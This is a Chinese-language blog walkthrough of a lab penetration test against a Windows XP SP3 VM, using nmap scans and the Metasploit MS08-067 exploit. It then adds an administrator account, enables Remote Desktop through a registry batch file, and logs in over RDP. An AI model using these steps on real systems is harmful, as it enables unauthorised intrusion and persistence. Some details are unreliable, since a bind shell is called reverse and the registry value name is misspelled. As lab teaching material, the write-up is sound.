当前位置: 首页 > article >正文

Windows XP SP3 Chinese - Simplified (NX)渗透详细解析

环境搭建

攻击机:kali
靶机:Windows XP SP3 Chinese - Simplified (NX)
靶机下载:链接:https://pan.baidu.com/s/1yjHuJI0L2AaboM7wBbYIPQ?pwd=hhhh
提取码:hhhh
注意需要让两台主机使用同一个网卡(使他们在同一网段)

在这里插入图片描述

漏洞扫描

arp-scan -l #扫描局域网所有存活主机

在这里插入图片描述
在这里插入图片描述
10.10.10.1是我的VMent8
10.10.10.2是我的打印机
10.10.10.254是广播地址
使用靶机ip地址是10.10.10.142

nmap -sV 10.10.10.142 #对靶机进行版本检测扫描
-sV #进行版本检测扫描

在这里插入图片描述

nmap -sV -O 10.10.10.142
#-sV:这个参数表示进行版本扫描。Nmap会尝试确定远程主机的服务和应用程序版本。
#-O:这个参数表示进行操作系统检测。Nmap会尝试确定远程主机的操作系统类型

OS details是主机系统类型,得知道它的类型有可能是Microsoft Windows 2000 SP2 - SP4, Windows XP SP2 - SP3, or Windows Server 2003 SP0 - SP2
在这里插入图片描述

nmap --script=vuln 10.10.10.142 #使用脚本对靶机进行已知漏洞扫描
#--script指定脚本,vuln这个脚本包含了多种用于检测常见安全漏洞的脚本

这里使用漏洞ms08-067
在这里插入图片描述

漏洞利用

使用msf

msfconsole

在这里插入图片描述

search ms08-067 #搜索ms08-067的漏洞模块

在这里插入图片描述

use 0 #使用模块
show missing #查看必须填写的信息

在这里插入图片描述

set RHOSTS 10.10.10.142 #把RHOSTS设置为靶机IP
show options #查看全部配置情况

在这里插入图片描述
接下来配置payload

show payloads #查看所有payload
我们需要靶机返回shell,所有使用3
use 3 #使用模块3

为什么要使用use3
因为generic/shell_bind_tcp是一种通用的反向TCP shell载荷,可以在攻击成功后获取一个TCP shell连接。在Metasploit框架中,它通常用于在目标系统上执行命令或上传/下载文件。在攻击成功后获取一个TCP shell连接,而且我们靶机扫描到445/tcp端口开放。
在这里插入图片描述
接下来设置target
在这里插入图片描述

show targets #查看targets的模块

target指的是目标系统或目标主机。我们不能到主机是什么操作系统类型用target测试Microsoft Windows 2000 SP2 - SP4, Windows XP SP2 - SP3, or Windows Server 2003 SP0 - SP2。我们知道目标主机是Windows XP SP3 Chinese - Simplified (NX)
在这里插入图片描述
找到Windows XP SP3 Chinese - Simplified (NX)的id是34

use 34

在这里插入图片描述
全部配置成功

run #开始攻击

出现C:\WINDOWS\system32表示成功

net user admin pass /add && net localgroup administrators admin /add #在Windows系统中添加一个名为"admin"的用户,并将其添加到管理员组
#localgroup 是用来管理本地计算机上的用户和组的命令。
#administrators 是我们要添加用户的组名
#/add参数表添加

在这里插入图片描述

echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDeny TSConnectios /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat 
#开启远程桌面服务,3389端口

echo 命令将一段字符串输出到文件 C:\WINDOWS\system32\3389.bat 中。这段字符串实际上是向注册表中添加一个新的键值。键路径为 “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server”,键名为 “Deny TSConnectios”,它的类型为 REG_DWORD(32位),值为 00000000(即 0)。这个操作允许远程桌面连接。
call 3389.bat
这个命令调用前面生成的 3389.bat 批处理文件。这将执行在注册表中添加新键值的操作。
成功后

netstat -an #查看靶机开启的所有端口

发现3389端口打开
在这里插入图片描述
新开一个终端

rdesktop 10.10.10.142#远程到靶机

再输入我们之前创建的用户admin和密码pass登录即可
在这里插入图片描述
自此Windows XP SP3 Chinese - Simplified (NX)渗透结束

渗透时出现的问题

漏洞成功利用但是不能创建会话
在这里插入图片描述
有以下几种可能:
1.如果你的kali中有防火墙,记得关闭,因为反shell是通过靶机发向kali,防火墙会将它拦截导致会话不能建立
2.kali的4444端口被占用,用set LPORT更改端口号
在这里插入图片描述
3.靶机的445端口关闭了
我也不知道为什么445端口自己关闭了,重启靶机后就行了
在这里插入图片描述
对了,kali终端字体编码要修改为GB2321不然会乱码,我没有找到怎么修改。
在这里插入图片描述
有所不错的地方希望大家指出。

http://www.lryc.cn/news/2413945.html

相关文章:

  • 傅里叶变换 二维离散傅里叶变换
  • Nature Microbiology | 可感染阿斯加德古菌的六种深海沉积物中的病毒基因组
  • 3DMAX程序贴图之3D木材贴图使用教程
  • java与javascript
  • 模糊神经网络系统1
  • MOS基础知识
  • 笔记本电脑如何开启wifi热点共享
  • BeanUtils.populate方法使用
  • 最大相关 - 最小冗余(mRMR)特征选择
  • 深度时空网络、记忆网络与特征表达学习在 CTR 预估中的应用
  • C#实现在RichTextBox控件中显示RTF格式的文件(附完整源码)
  • Linux网络编程-wireshark和tcpdump抓包(数据过滤和分析)
  • 知识图谱概念与知识图谱构建流程(KGC)总览
  • Java中StringBuilder的清空方法比较
  • 数据库SQL优化大总结1之- 百万级数据库优化方案
  • 9个Mac软件下载站,天下没有难找的软件。
  • CA证书服务器搭建及证书申请
  • DEDE5.7 模板文件不存在,无法解析文档个中解决方法
  • 【前端素材】推荐优质后台管理系统Acara平台模板(附源码)
  • IIS无法启动:发生意外错误0x8ffe2740的原因
  • 控制理论中常见名词中英文对照
  • 使用DM368的GPIO控制NANDFLASH的WP
  • Java图形化界面编程超详细知识点(7)——进度条
  • 雅虎YUI 3.7.1发布
  • FastDFS,Redis,Solr,ActiveMQ核心技术整合二(1)
  • CTF training WriteUp
  • 【转】花开正当时,十四款120/128GB SSD横向评测
  • widgets
  • win7开机出现修复计算机,win7开机提示系统自动修复无法正常进入的原因分析及解决...
  • 空间转换与动画